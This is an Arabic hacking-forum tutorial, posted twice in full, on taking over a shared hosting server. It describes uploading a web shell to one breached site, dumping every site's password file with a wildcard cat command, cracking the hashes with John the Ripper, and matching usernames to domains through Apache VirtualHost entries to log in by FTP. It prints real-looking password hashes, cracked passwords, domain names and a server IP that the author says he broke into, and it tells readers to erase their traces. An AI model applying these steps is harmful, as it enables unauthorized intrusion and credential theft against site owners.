كيفية السيطرة على سيرفر كامل
بسم الله الرحمن الرحيم
//////CoPy RiGhTs\\\\\\
ll ©opy ®ights ®efers@
PrO-†H!3F
SUFYAN_14@HOTMAIL.COM
MEMBER IN CONDOR HACKERS TEAM
للي يريد ينقل الموضوع لا ينقص حاجة وبذات هذي الفقرة
انا عارف انك تبي تحذف هالجزء وبعدين تحدد الموضوع وتعمل كت وبست وتنقله لمنتدى ثاني وتكتب اخر الموضوع اسمك لكن ما نقووول الا الله يعينك
//////CoPy RiGhTs\\\\\\
قبل البداية:
هذا الشرح ما هو CUT & COPY مثل الي نشووفه كل يوم ؟؟.!! في هالمنتديات
انا اعرف انه لما كل واحد يشوف موضوع هايكنج
يقوول هذا منقول ولا فعقله يقول (( اكيد هذا مثل الي قبله ))
انا ما بقولكم هنا انه الهاكر هو كذا كذا و عملية الاختراق كذا وكذا ----> تعرفوا فيه مواضيع كثيرة كذيه ما مصدق!!!!
سوي بحث هنا وبتشوف اغلب المشاركات كذاك كلها نفس الشئ واعتقد اني قريت مثل هالمواضيع (الغير عملية) بس يعني فيها معلومات بالعربي (( ما معلومات كمبيوتريه) مليون مره في مليون منتدى حتى لو تبي روح على موقع الشامسي وبتعرف.........؟
اولا: ما هو السيرفر
الله يسلمكم السيرفر او (( الخادم)) هو جهاز قوي يكون مجهز بكل ما يحتاج له اصحاب المواقع FTP SMTP HTTP POP3 PHP
المهم هذا الجهاز هو المستضيف وغالبا ما يكون على نظام linux وuinx لكن الحين انخفضت شعبية اليونكس والسبة هو الينكس حيث زاد اهتمام الناس باللينكس وتطويره ----->(صار يدعم العربي) وغالبا ما يستخدموا apache في هذي الانطمة (لانهااصلا تجي جاهزة مع النظام)
وفيه بعض السيرفرات تستخدم ال Windows 2000 (وهذي اغلب المواقع ذات النطاق *.il الله يلعهنم )
لكن الشئ الغريب حتى مايكروسوفت صاحبة win2000 ما تستخدمة بل تستخدم ال *NIX حتى البتاجون طلعوا في برنامج compunet يوم الخميس الماضي خبر انه البتاجون يستخدم انظمة ال OPEN Source وهذي العيلة الي منها ال UNIX & LINUX .
سألت واحد من الربع عن السبب ؟؟ قال انه الانظمة مفتوحة المصادر (open source) تكون على تطوير دائم من قبل مجموعه غير محددة من الاشخاص -----> وهذا اكيد يعطينا نظام اكثر قوه من الناحية الامنية (High Security)
ماذا تحتاج :
شل او نظام تشغيل لينكس
موقع مخترق على نفس السيرفر
اخيرا:
انا ما عندي لينكس ((لحد الحين)) لذلك بشرح على طريقة الشل وبتالحديد البياتشبي
بعد ما تخترق الموقع الي موجود على نفس السيرفر الضحية نرفع الشل للموقع وندخل عليه يطلع لنا مستطيل يسموه (Command line) هنيه بنحتاج لبعض الاوامر الخاصة باللينكس
اول جزء الي مكتوب فيه
CUrrent Working Directory
members.lycos.co.uk/prothief/shell/dir.bmp
هذا يوضح لك المسار الي انته فيه يعني الاوامر الي بترسلها بتتنفذ في هذا الفولدر
الجزء الي تحته
Choose New working directory
members.lycos.co.uk/prothief/shell/cdir.bmp
هذا الله يسلمكم مثل ما تشوفوا بيه تقدر( تقدري) دخل على الفولدرات الموجوده في نفس المسار
الجزء الي تحته
command
members.lycos.co.uk/prothief/shell/command.bmp
وشغلنا كله هنا بيكون مثل ما تشووف هنا بنكتب الاوامر الي بنرسلها للخادم
الجزء الاخير
وهذا مربع النتيجة يعني بعد ما ترسل الامر الرد بيكون في هذا المربع ( مثل ما نسمي انا وربعي الثمرة)
الحين نجيي في الكلام الحلو
الي ما دام الشل قدامنا ما علينا الا انا نرسل الاوامر الى الخادم مثلا نحنا نريد هنا نخترق جميع المواقع الموجودة في السيرفر ( السيطرة على السيرفر كامل) بنستخدم امر اللينكس في القراءةالي هو CAT وبكل سهوله بنقرأ جميع ملفات ال PASWD.PWD
cat ./home/*/etc/passwd.pwd
نشرح اليي كتبناه
طبعا
cat هو امر الكتابة
. هذي النقطة هي عبارة عن اختصار للجذر يعني بدل ما كتب الROOT نكتب .\
home هذا الفولدر الحلو فيه الفلودرات الرئيسية لكل المواقع (الي هي بالتحديد اصلا اليوز نيم للموقع) تراه اليوز نيم دايما معروف يكون يشبة الموقع مثلا لو omantel.net.om اليوز نيم ماله ما يخرج عن oman ? omantel ? omantelnet وقيس على البقية
* النجمة مثل ما تعرفوا نحنا نستخدم النجمة كل مكان فيه بحث (( ما ادري اذا سمعتوا عن قوانين البحث SEARCHING RULES)) للي ما يعرف --النجمة معناها بالعربي اي شئ يعني اي شئ (فولدر) موجود في فولدر home
etc هذا الفولدر موجود في كل المواقع وفيه يتم حفظ ملف الباسورد الي يستخدمة عميل برتوكول نقل الملفات ( FTP CLIENT )لمقارنة الباسورد الي كتبها صاحب الموقع والباسورد المشفرة في ملف الPASSWD.PWD
اخيرا ملف الPASSWD.PWD هذا الملف مثل ما قلت فووق يحتوي على الباسورد الخاصة بالموقع لكن مشفرة بتشفير DES او md5
على فكرة فيه مرات بعض المواقع خاصة الكبيرة منها تحاول انها تخفي ملف الPASSWD.pwd وهذا عن طريق ما يسمى بملف الظل ((عملية تظليل)) SHADOW FILE فلما يتم تظليل ملف الباسورد بملفات الشادو تصبح عملية فك التشفير صعبببببة برابر (( سألوا مجرب ولا تسألوا طبيب )) لكن الله يخلي المبرمجين بعدهم يطلعوا برامج تفك تشفير الشادو لكن ما تفك ملف الشادو وبس لالا بتفك الشادو ووحده ذا سالفه بعدين بتفك ملف الباسورد
لو تبي معلومات اكثر استخدم محرك بحث الهاكرز (GOOGLE.com) وابحث عن الشادوينج والتشفير والشادو كراكرز وقووووووووووومهم
((ما اعتقد واحد بيتعب عمره ويبحث ما ادري لكن 100% السبب لاننا عرب))
المهم نرجع لمحور حديثنا
بعد ما نرسل هالامر cat ./home/*/etc/passwd.pwd
يطلع لنا في صندوق الثمرة ( الRESULT ) وبتحصل على محتويات كل ملفات الباسورد الموجودة في كل موقع
وتكون على هذا الشكل
#front page :
user : md5 passwd
تريدوا مثال........؟ خذوا واحد
#front page :
adultsex:$1$Hlcv7n3j$6iknsOVG/q/ZRc6wV/Vu9.
#front page :
adults:$1$veDmvS9k$4Vixi7yWhHKtnGzvRG7Zs0
#front page :
amer1:5vv5VkSD.MTno
#front page :
zoneback:jvdW/t1qVzB.g
#front page :
babulnat:CvIQWfUYKivJY
#front page :
bamp:kO0I8PBjUiSdI
لالالا ما تخاف هذي ما باسورد وحده هذي6 باسورد ل6 موقع مختلف
المهم لا تفرح واجد ما تقوول خلاص خلصت واخترقت بعده وراك مشوار هدي هدي ما ما تحزن ما واجدخلص الكثير وبقى القليل
مثل ما قلت لكم فووق انه هذي الملفات دايما تكون مشفرة بتشفير md5 ----> انا اكره مثل هالتشفير (اصلا اكره كل انواع التشفير لانها تزيد مهمتنا صعوبة ))
الحين لازم اننا نفك التشفير وهنا نستخدم برنامج اسمه John the ripper من اسمه رووعه ههههههههه
وصلة تنزيلة.... تحصلوها في موقعه الرسمي openwall.com/john
ادخل الموقع واختار الوصلة الي تتناسب مع نظام التشغيل مالك ( Unix Linux Win9x Win2k winXP ) وفيه نوعين تراه من البرنامج يعني لا تتلخبط هما صحيح نوعين لكنهم نفس الشئ لكن الفرق انه واحد منهم مفتوح المصدر (( يوم اقولكم انه الببرامج مفتوحة المصدر اقوى من البرامج المغلقة ))
المهم علشان ما تعبكم خذوا الوصلة مباشرة
openwall.com/john/dl/john-16w.zip
الحين نزله وبعدين فك الضغط في الC:
اذا تبي تتفلسف اقرا الملفات الموجودة في ملف الDOCs واذا تبي تكمل معاي على طووول خلى في المجلد run
المهم الحين خذ الباسوردات المشفرة الي فووق
وامسح عنهم جملة ال
#front page :
يعني يصيروا كذا
adultsex:$1$Hlcv7n3j$6iknsOVG/q/ZRc6wV/Vu9.
adults:$1$veDmvS9k$4Vixi7yWhHKtnGzvRG7Zs0
amer1:5vv5VkSD.MTno
zoneback:jvdW/t1qVzB.g
babulnat:CvIQWfUYKivJY
bamp:kO0I8PBjUiSdI
وافتح ملف نوتباد جديد *.txt وانقل الباسوردات فيه وسميه مثلا pass.txt وحفظه في نفس المجلد الي فيه الجون
C:/john-16/run
والحين ادخل على الms-dos وهذا تدخله عن طريق
start -> run
واكتب في المستطيل
command.com
واضغط اوكي
الحين يطلع لك مربع اسود اكتب cd.. cd.. cd.. cd لحد ما يطلع قدامك بس C:/
والحين اكتب
cd john-16
ومره ثانيه
cd run
واخيرا اكتب
john.exe -i:all pass.txt
وخلاص الحين يبدأ الجون في فك التشفير
اذا تضغط على اي زر بيطلع لك حالة فك التشفير كم استغرق وكم وحده فك وكذيه يعني
ولما يفك الجون اي باسورد بيطلع لك اياها في الشاشة
ولما يتنهي من فك كل التشفير بتحصل الباسوردات في ملف اسمه john.pot واذا فتحته بالنوت باد احسن لك تراه هو تلقائا يفتح بالبوربوينت وتكون الباسوردات في الشرائح
تريدوا تشوفوا مثال على فك التشفير
members.lycos.co.uk/prothief/shell/john.bmp
رقم واحد
هذي هي الباسوردات الي فكها الجون
رقم اثنين
هذا عدد الباسوردات التي تم كسرها
رقم ثلاثة
هذا الزمن الي استغرقه الجون ليفك الباسوردات
رقم اربعه
هو التخمين الي الحين الجون يخمنه
بعد ما ينتهي الجون من فك التشفير ويخليها في ملف john.pot نفته بالنوت باد وبعدين بنحصل هذا الشكل
5vv5VkSD.MTno:michael
jvdW/t1qVzB.g:password
CvIQWfUYKivJY:michael
kO0I8PBjUiSdI:michael
ولو تقارن هالباسوردات مع الي فوووق
adultsex:$1$Hlcv7n3j$6iknsOVG/q/ZRc6wV/Vu9. ------>هذي لغيتها الباسورد مالها زفته
adults:$1$veDmvS9k$4Vixi7yWhHKtnGzvRG7Zs0 ------> حتى هذي
amer1:5vv5VkSD.MTno
zoneback:jvdW/t1qVzB.g
babulnat:CvIQWfUYKivJY
bamp:kO0I8PBjUiSdI
المهم بتحصل انه
الباسوردات: من ملف john.pot
5vv5VkSD.MTno:michael
jvdW/t1qVzB.g:password
CvIQWfUYKivJY:michael
kO0I8PBjUiSdI:michael
الباسوردات المشفرة من السيرفر((ملفات الpasswd.pwd((
amer1:5vv5VkSD.MTno
zoneback:jvdW/t1qVzB.g
babulnat:CvIQWfUYKivJY
bamp:kO0I8PBjUiSdI
بتعرف انه الي على يمين ال : هو في المجموعه الباسوردات من ملفات الpasswd.pwd
هي اليوزنيم للمواقع
وانه الي على اليسار ال: هن الباسوردات لليوزنيم
يعني
||user||------------||password||
amer1-------------------michael
zoneback------------------password
babulnat------------------micheal
bamp---------------------micheal
الحين خلاص حصلنا اليوز والباس بقى شئ واحد؟؟؟ شنو هووووو
الله يسلمك نحنا عرفنا الباسوردات واليوزرات بس اسماء المواقع وين حتى ندخل الافتيبي ملها؟؟؟.؟.؟
بكل بساطه نرجع للشل ((موه نسيتوه)) ونروح نرسل الاوامر للسيرفر
؟؟؟ اي امر؟؟؟
انا ما بعطيكم اياه الي يريد يبحث ويدور لكن بعطيكم مساعدة (( اتصال بصديق))هيهيهيهيهي
لازم حتى تعرف اليوزات نقرأ ملف الكونفج للسيرفر (الاباتشي )) يعني لازم تدور في السيرفر على ملفات الاباتشي وينننهااا لو سألت اي واحد عنده سيرفر بيعرف واعتقد كثيرين يعرفوا هالشئ
المهم بنستخدم امر cat وبنقرأ ملف ال cfg.* وبعدين بنحصل على اليوزرات بهذا الشكل (( طبعا هو ملف كبيييير لكن انه سوي كت وكوبي من مربع الثمرة وبعدين الصقه بالوورد واستخدم امر البحث في المايكروسوفت وورد واكتب اليوز نيم مال الموقع الي تريد تعرفه مثلا لو كتبت amer1 وهذا اليوز نيم الاول معا في الشرح بنحصل على هالفقرة
<VirtualHost 64.5.44.143>
ServerAlias american-index-hedge.com american-index-hedge.com
ServerAdmin webmaster@american-index-hedge.com
DocumentRoot /home/amer1/public_html-----------------------------------> هنا نتيجة البحث في الورد بقولك انه amer1 موجود هنا
BytesLog domlogs/american-index-hedge.com-bytes_log
User amer1
Group amer1
ServerName american-index-hedge.com--------------------------------> انته تعال هنا وبتحصل عنوان الموقع
CustomLog domlogs/american-index-hedge.com combined
ScriptAlias /cgi-bin/ /home/amer1/public_html/cgi-bin/
</VirtualHost>
الحين خذ عنوان الموقع واكتبه في عميل الافتيبي الي تستخدمه وخلااااص انته انته الحين في الموقع تقدر تسوي الي تسويه
ونعمل نفس الحركة ونطلع عناوين المواقع الثانيه
<VirtualHost 64.5.44.143>
ServerAlias zonebackups.com zonebackups.com
ServerAdmin webmaster@zonebackups.com
DocumentRoot /home/zoneback/public_html
BytesLog domlogs/zonebackups.com-bytes_log
User zoneback
Group zoneback
ServerName zonebackups.com
CustomLog domlogs/zonebackups.com combined
ScriptAlias /cgi-bin/ /home/zoneback/public_html/cgi-bin/
</VirtualHost>
<VirtualHost 64.5.44.143>
ServerAlias babulnath.org babulnath.org
ServerAdmin webmaster@babulnath.org
DocumentRoot /home/babulnat/public_html
BytesLog domlogs/babulnath.org-bytes_log
User babulnat
Group babulnat
ServerName babulnath.org
CustomLog domlogs/babulnath.org combined
ScriptAlias /cgi-bin/ /home/babulnat/public_html/cgi-bin/
</VirtualHost>
<VirtualHost 64.5.44.143>
ServerAlias bampkg.com bampkg.com
ServerAdmin webmaster@bampkg.com
DocumentRoot /home/bamp/public_html
BytesLog domlogs/bampkg.com-bytes_log
User bamp
Group bamp
ServerName bampkg.com
CustomLog domlogs/bampkg.com combined
ScriptAlias /cgi-bin/ /home/bamp/public_html/cgi-bin/
</VirtualHost>
لحد هنا تقريبا قطعت شووط كبير وعقبال ما نشوووفك هكرزي كبير
ملاحظة : هذي المواقع حقيقية والباسوردات ايضا بس انا مخترقنها تقريبا قبل اكثر من شهرين يعني الحين عااد اما المواقع مسكره واما انه تم تغيير الباسورد ما علينا تراه هدف الموضوع التعليم ونشر المعرفه وليس التخريب والتدمير
نصيحة : انا ما انزل هالدرس علشان تقحم على المواقع وتخرب خليي فبالك انه فيه شئ اسمه قانون يعني اذا ما حميت ظهرك بتنطعن قصدي انه لازم تأمن تحركاتك يعني ما تخترق وخلاص لا لا لا لازم تمسح اثار اختراقك وهذا وحده علم روووعه واكثر من روعه بعد وانشــاء الله بنزل كم درس عن كيفية التخفي الحقيقي في عمليات الاختراق (( واتمنى انك ما تستعجل وتروح تستخدم بروكسي وقلت خلاص انا مخفي لالالالا لانه البروكسيات العادية ما تخفي هويتك يعني .....))
اتمنى انه الموضوع كان على الاقل يستاهل القراءة لاني تعبت عليه
اي سؤال واي استفسار انا حضار اكتب ردك هنا واذا ما رديت عليك بتحصلني في الماسنجر 25/24 ساعه Sufyan_14@hotmail.com
تحياتي ((كاتب الموضوع الاصلي)) PrO-†H!3F
//////CoPy RiGhTs\\\\\\
ll ©opy ®ights ®efers@
PrO-†H!3F
SUFYAN_14@HOTMAIL.COM
MEMBER IN CONDOR HACKERS TEAM
للي يريد ينقل الموضوع لا ينقص حاجة وبذات هذي الفقرةانا عارف
انك تبي تحذف هالجزء وبعدين تحدد الموضوع وتعمل كت وبست وتنقله
لمنتدى ثاني وتكتب اخر الموضوع اسمك لكن ما نقووول الا الله يعينك
//////CoPy RiGhTs\\\\\\
بسم الله الرحمن الرحيم
//////CoPy RiGhTs\\\\\\
ll ©opy ®ights ®efers@
PrO-†H!3F
SUFYAN_14@HOTMAIL.COM
MEMBER IN CONDOR HACKERS TEAM
للي يريد ينقل الموضوع لا ينقص حاجة وبذات هذي الفقرة
انا عارف انك تبي تحذف هالجزء وبعدين تحدد الموضوع وتعمل كت وبست وتنقله لمنتدى ثاني وتكتب اخر الموضوع اسمك لكن ما نقووول الا الله يعينك
//////CoPy RiGhTs\\\\\\
قبل البداية:
هذا الشرح ما هو CUT & COPY مثل الي نشووفه كل يوم ؟؟.!! في هالمنتديات
انا اعرف انه لما كل واحد يشوف موضوع هايكنج
يقوول هذا منقول ولا فعقله يقول (( اكيد هذا مثل الي قبله ))انا ما بقولكم هنا انه الهاكر هو كذا كذا و عملية الاختراق كذا وكذا ----> تعرفوا فيه مواضيع كثيرة كذيه ما مصدق!!!!
سوي بحث هنا وبتشوف اغلب المشاركات كذاك كلها نفس الشئ واعتقد اني قريت مثل هالمواضيع (الغير عملية) بس يعني فيها معلومات بالعربي (( ما معلومات كمبيوتريه) مليون مره في مليون منتدى حتى لو تبي روح على موقع الشامسي وبتعرف.........؟
اولا: ما هو السيرفر
الله يسلمكم السيرفر او (( الخادم)) هو جهاز قوي يكون مجهز بكل ما يحتاج له اصحاب المواقع FTP SMTP HTTP POP3 PHP
المهم هذا الجهاز هو المستضيف وغالبا ما يكون على نظام linux وuinx لكن الحين انخفضت شعبية اليونكس والسبة هو الينكس حيث زاد اهتمام الناس باللينكس وتطويره ----->(صار يدعم العربي) وغالبا ما يستخدموا apache في هذي الانطمة (لانهااصلا تجي جاهزة مع النظام)
وفيه بعض السيرفرات تستخدم ال Windows 2000 (وهذي اغلب المواقع ذات النطاق *.il الله يلعهنم )
لكن الشئ الغريب حتى مايكروسوفت صاحبة win2000 ما تستخدمة بل تستخدم ال *NIX حتى البتاجون طلعوا في برنامج compunet يوم الخميس الماضي خبر انه البتاجون يستخدم انظمة ال OPEN Source وهذي العيلة الي منها ال UNIX & LINUX .
سألت واحد من الربع عن السبب ؟؟ قال انه الانظمة مفتوحة المصادر (open source) تكون على تطوير دائم من قبل مجموعه غير محددة من الاشخاص -----> وهذا اكيد يعطينا نظام اكثر قوه من الناحية الامنية (High Security)
ماذا تحتاج :
شل او نظام تشغيل لينكس
موقع مخترق على نفس السيرفر
اخيرا:
انا ما عندي لينكس ((لحد الحين)) لذلك بشرح على طريقة الشل وبتالحديد البياتشبي
بعد ما تخترق الموقع الي موجود على نفس السيرفر الضحية نرفع الشل للموقع وندخل عليه يطلع لنا مستطيل يسموه (Command line) هنيه بنحتاج لبعض الاوامر الخاصة باللينكس
اول جزء الي مكتوب فيه
CUrrent Working Directory
members.lycos.co.uk/prothief/shell/dir.bmp
هذا يوضح لك المسار الي انته فيه يعني الاوامر الي بترسلها بتتنفذ في هذا الفولدر
الجزء الي تحته
Choose New working directory
members.lycos.co.uk/prothief/shell/cdir.bmp
هذا الله يسلمكم مثل ما تشوفوا بيه تقدر( تقدري) دخل على الفولدرات الموجوده في نفس المسار
الجزء الي تحته
command
members.lycos.co.uk/prothief/shell/command.bmp
وشغلنا كله هنا بيكون مثل ما تشووف هنا بنكتب الاوامر الي بنرسلها للخادم
الجزء الاخير
وهذا مربع النتيجة يعني بعد ما ترسل الامر الرد بيكون في هذا المربع ( مثل ما نسمي انا وربعي الثمرة)
الحين نجيي في الكلام الحلو
الي ما دام الشل قدامنا ما علينا الا انا نرسل الاوامر الى الخادم مثلا نحنا نريد هنا نخترق جميع المواقع الموجودة في السيرفر ( السيطرة على السيرفر كامل) بنستخدم امر اللينكس في القراءةالي هو CAT وبكل سهوله بنقرأ جميع ملفات ال PASWD.PWD
cat ./home/*/etc/passwd.pwd
نشرح اليي كتبناه
طبعا
cat هو امر الكتابة
. هذي النقطة هي عبارة عن اختصار للجذر يعني بدل ما كتب الROOT نكتب .\
home هذا الفولدر الحلو فيه الفلودرات الرئيسية لكل المواقع (الي هي بالتحديد اصلا اليوز نيم للموقع) تراه اليوز نيم دايما معروف يكون يشبة الموقع مثلا لو omantel.net.om اليوز نيم ماله ما يخرج عن oman ? omantel ? omantelnet وقيس على البقية
* النجمة مثل ما تعرفوا نحنا نستخدم النجمة كل مكان فيه بحث (( ما ادري اذا سمعتوا عن قوانين البحث SEARCHING RULES)) للي ما يعرف --النجمة معناها بالعربي اي شئ يعني اي شئ (فولدر) موجود في فولدر home
etc هذا الفولدر موجود في كل المواقع وفيه يتم حفظ ملف الباسورد الي يستخدمة عميل برتوكول نقل الملفات ( FTP CLIENT )لمقارنة الباسورد الي كتبها صاحب الموقع والباسورد المشفرة في ملف الPASSWD.PWD
اخيرا ملف الPASSWD.PWD هذا الملف مثل ما قلت فووق يحتوي على الباسورد الخاصة بالموقع لكن
مشفرة بتشفير DES او md5 على فكرة فيه مرات بعض المواقع خاصة الكبيرة منها تحاول انها تخفي ملف الPASSWD.pwd وهذا عن طريق ما يسمى بملف الظل ((عملية تظليل)) SHADOW FILE فلما يتم تظليل ملف الباسورد بملفات الشادو تصبح عملية فك التشفير صعبببببة برابر (( سألوا مجرب ولا تسألوا طبيب )) لكن الله يخلي المبرمجين بعدهم يطلعوا برامج تفك تشفير الشادو لكن ما تفك ملف الشادو وبس لالا بتفك الشادو ووحده ذا سالفه بعدين بتفك ملف الباسورد
لو تبي معلومات اكثر استخدم محرك بحث الهاكرز (GOOGLE.com) وابحث عن الشادوينج والتشفير والشادو كراكرز وقووووووووووومهم
((ما اعتقد واحد بيتعب عمره ويبحث ما ادري لكن 100% السبب لاننا عرب))
المهم نرجع لمحور حديثنا
بعد ما نرسل هالامر cat ./home/*/etc/passwd.pwd
يطلع لنا في صندوق الثمرة ( الRESULT ) وبتحصل على محتويات كل ملفات الباسورد الموجودة في كل موقع
وتكون على هذا الشكل
#front page :
user : md5 passwd
تريدوا مثال........؟ خذوا واحد
#front page :
adultsex:$1$Hlcv7n3j$6iknsOVG/q/ZRc6wV/Vu9.
#front page :
adults:$1$veDmvS9k$4Vixi7yWhHKtnGzvRG7Zs0
#front page :
amer1:5vv5VkSD.MTno
#front page :
zoneback:jvdW/t1qVzB.g
#front page :
babulnat:CvIQWfUYKivJY
#front page :
bamp:kO0I8PBjUiSdI
لالالا ما تخاف هذي ما باسورد وحده هذي6 باسورد ل6 موقع مختلف
المهم لا تفرح واجد ما تقوول خلاص خلصت واخترقت بعده وراك مشوار هدي هدي ما ما تحزن ما واجدخلص الكثير وبقى القليل
مثل ما قلت لكم فووق انه هذي الملفات دايما تكون مشفرة بتشفير md5 ----> انا اكره مثل هالتشفير (اصلا اكره كل انواع التشفير لانها تزيد مهمتنا صعوبة ))
الحين لازم اننا نفك التشفير وهنا نستخدم برنامج اسمه John the ripper من اسمه رووعه ههههههههه
وصلة تنزيلة.... تحصلوها في موقعه الرسمي openwall.com/john
ادخل الموقع واختار الوصلة الي تتناسب مع نظام التشغيل مالك ( Unix Linux Win9x Win2k winXP ) وفيه نوعين تراه من البرنامج يعني لا تتلخبط هما صحيح نوعين لكنهم نفس الشئ لكن الفرق انه واحد منهم مفتوح المصدر (( يوم اقولكم انه الببرامج مفتوحة المصدر اقوى من البرامج المغلقة ))
المهم علشان ما تعبكم خذوا الوصلة مباشرة
openwall.com/john/dl/john-16w.zip
الحين نزله وبعدين فك الضغط في الC:
اذا تبي تتفلسف اقرا الملفات الموجودة في ملف الDOCs واذا تبي تكمل معاي على طووول خلى في المجلد run
المهم الحين خذ الباسوردات المشفرة الي فووق
وامسح عنهم جملة ال
#front page :
يعني يصيروا كذا
adultsex:$1$Hlcv7n3j$6iknsOVG/q/ZRc6wV/Vu9.
adults:$1$veDmvS9k$4Vixi7yWhHKtnGzvRG7Zs0
amer1:5vv5VkSD.MTno
zoneback:jvdW/t1qVzB.g
babulnat:CvIQWfUYKivJY
bamp:kO0I8PBjUiSdI
وافتح ملف نوتباد جديد *.txt وانقل الباسوردات فيه وسميه مثلا pass.txt وحفظه في نفس المجلد الي فيه الجون
C:/john-16/run
والحين ادخل على الms-dos وهذا تدخله عن طريق
start -> run
واكتب في المستطيل
command.com
واضغط اوكي
الحين يطلع لك مربع اسود اكتب cd.. cd.. cd.. cd لحد ما يطلع قدامك بس C:/
والحين اكتب
cd john-16
ومره ثانيه
cd run
واخيرا اكتب
john.exe -i:all pass.txt
وخلاص الحين يبدأ الجون في فك التشفير
اذا تضغط على اي زر بيطلع لك حالة فك التشفير كم استغرق وكم وحده فك وكذيه يعني
ولما يفك الجون اي باسورد بيطلع لك اياها في الشاشة
ولما يتنهي من فك كل التشفير بتحصل الباسوردات في ملف اسمه john.pot واذا فتحته بالنوت باد احسن لك تراه هو تلقائا يفتح بالبوربوينت وتكون الباسوردات في الشرائح
تريدوا تشوفوا مثال على فك التشفير
members.lycos.co.uk/prothief/shell/john.bmp
رقم واحد
هذي هي الباسوردات الي فكها الجون
رقم اثنين
هذا عدد الباسوردات التي تم كسرها
رقم ثلاثة
هذا الزمن الي استغرقه الجون ليفك الباسوردات
رقم اربعه
هو التخمين الي الحين الجون يخمنه
بعد ما ينتهي الجون من فك التشفير ويخليها في ملف john.pot نفته بالنوت باد وبعدين بنحصل هذا الشكل
5vv5VkSD.MTno:michael
jvdW/t1qVzB.g:password
CvIQWfUYKivJY:michael
kO0I8PBjUiSdI:michael
ولو تقارن هالباسوردات مع الي فوووق
adultsex:$1$Hlcv7n3j$6iknsOVG/q/ZRc6wV/Vu9. ------>هذي لغيتها الباسورد مالها زفته
adults:$1$veDmvS9k$4Vixi7yWhHKtnGzvRG7Zs0 ------> حتى هذي
amer1:5vv5VkSD.MTno
zoneback:jvdW/t1qVzB.g
babulnat:CvIQWfUYKivJY
bamp:kO0I8PBjUiSdI
المهم بتحصل انه
الباسوردات: من ملف john.pot
5vv5VkSD.MTno:michael
jvdW/t1qVzB.g:password
CvIQWfUYKivJY:michael
kO0I8PBjUiSdI:michael
الباسوردات المشفرة من السيرفر((ملفات الpasswd.pwd((
amer1:5vv5VkSD.MTno
zoneback:jvdW/t1qVzB.g
babulnat:CvIQWfUYKivJY
bamp:kO0I8PBjUiSdI
بتعرف انه الي على يمين ال : هو في المجموعه الباسوردات من ملفات الpasswd.pwd
هي اليوزنيم للمواقع
وانه الي على اليسار ال: هن الباسوردات لليوزنيم
يعني
||user||------------||password||
amer1-------------------michael
zoneback------------------password
babulnat------------------micheal
bamp---------------------micheal
الحين خلاص حصلنا اليوز والباس بقى شئ واحد؟؟؟ شنو هووووو
الله يسلمك نحنا عرفنا الباسوردات واليوزرات بس اسماء المواقع وين حتى ندخل الافتيبي ملها؟؟؟.؟.؟
بكل بساطه نرجع للشل ((موه نسيتوه)) ونروح نرسل الاوامر للسيرفر
؟؟؟ اي امر؟؟؟
انا ما بعطيكم اياه الي يريد يبحث ويدور لكن بعطيكم مساعدة (( اتصال بصديق))هيهيهيهيهي
لازم حتى تعرف اليوزات نقرأ ملف الكونفج للسيرفر (الاباتشي )) يعني لازم تدور في السيرفر على ملفات الاباتشي وينننهااا لو سألت اي واحد عنده سيرفر بيعرف واعتقد كثيرين يعرفوا هالشئ
المهم بنستخدم امر cat وبنقرأ ملف ال cfg.* وبعدين بنحصل على اليوزرات بهذا الشكل (( طبعا هو ملف كبيييير لكن انه سوي كت وكوبي من مربع الثمرة وبعدين الصقه بالوورد واستخدم امر البحث في المايكروسوفت وورد واكتب اليوز نيم مال الموقع الي تريد تعرفه مثلا لو كتبت amer1 وهذا اليوز نيم الاول معا في الشرح بنحصل على هالفقرة
<VirtualHost 64.5.44.143>
ServerAlias american-index-hedge.com american-index-hedge.com
ServerAdmin webmaster@american-index-hedge.com
DocumentRoot /home/amer1/public_html-----------------------------------> هنا نتيجة البحث في الورد بقولك انه amer1 موجود هنا
BytesLog domlogs/american-index-hedge.com-bytes_log
User amer1
Group amer1
ServerName american-index-hedge.com--------------------------------> انته تعال هنا وبتحصل عنوان الموقع
CustomLog domlogs/american-index-hedge.com combined
ScriptAlias /cgi-bin/ /home/amer1/public_html/cgi-bin/
</VirtualHost>
الحين خذ عنوان الموقع واكتبه في عميل الافتيبي الي تستخدمه وخلااااص انته انته الحين في الموقع تقدر تسوي الي تسويه
ونعمل نفس الحركة ونطلع عناوين المواقع الثانيه
<VirtualHost 64.5.44.143>
ServerAlias zonebackups.com zonebackups.com
ServerAdmin webmaster@zonebackups.com
DocumentRoot /home/zoneback/public_html
BytesLog domlogs/zonebackups.com-bytes_log
User zoneback
Group zoneback
ServerName zonebackups.com
CustomLog domlogs/zonebackups.com combined
ScriptAlias /cgi-bin/ /home/zoneback/public_html/cgi-bin/
</VirtualHost>
<VirtualHost 64.5.44.143>
ServerAlias babulnath.org babulnath.org
ServerAdmin webmaster@babulnath.org
DocumentRoot /home/babulnat/public_html
BytesLog domlogs/babulnath.org-bytes_log
User babulnat
Group babulnat
ServerName babulnath.org
CustomLog domlogs/babulnath.org combined
ScriptAlias /cgi-bin/ /home/babulnat/public_html/cgi-bin/
</VirtualHost>
<VirtualHost 64.5.44.143>
ServerAlias bampkg.com bampkg.com
ServerAdmin webmaster@bampkg.com
DocumentRoot /home/bamp/public_html
BytesLog domlogs/bampkg.com-bytes_log
User bamp
Group bamp
ServerName bampkg.com
CustomLog domlogs/bampkg.com combined
ScriptAlias /cgi-bin/ /home/bamp/public_html/cgi-bin/
</VirtualHost>
لحد هنا تقريبا قطعت شووط كبير وعقبال ما نشوووفك هكرزي كبير
ملاحظة : هذي المواقع حقيقية والباسوردات ايضا بس انا مخترقنها تقريبا قبل اكثر من شهرين يعني الحين عااد اما المواقع مسكره واما انه تم تغيير الباسورد ما علينا تراه هدف الموضوع التعليم ونشر المعرفه وليس التخريب والتدمير
نصيحة : انا ما انزل هالدرس علشان تقحم على المواقع وتخرب خليي فبالك انه فيه شئ اسمه قانون يعني اذا ما حميت ظهرك بتنطعن قصدي انه لازم تأمن تحركاتك يعني ما تخترق وخلاص لا لا لا لازم تمسح اثار اختراقك وهذا وحده علم روووعه واكثر من روعه بعد وانشــاء الله بنزل كم درس عن كيفية التخفي الحقيقي في عمليات الاختراق (( واتمنى انك ما تستعجل وتروح تستخدم بروكسي وقلت خلاص انا مخفي لالالالا لانه البروكسيات العادية ما تخفي هويتك يعني .....))
اتمنى انه الموضوع كان على الاقل يستاهل القراءة لاني تعبت عليه
اي سؤال واي استفسار انا حضار اكتب ردك هنا واذا ما رديت عليك بتحصلني في الماسنجر 25/24 ساعه Sufyan_14@hotmail.com
تحياتي ((كاتب الموضوع الاصلي)) PrO-†H!3F
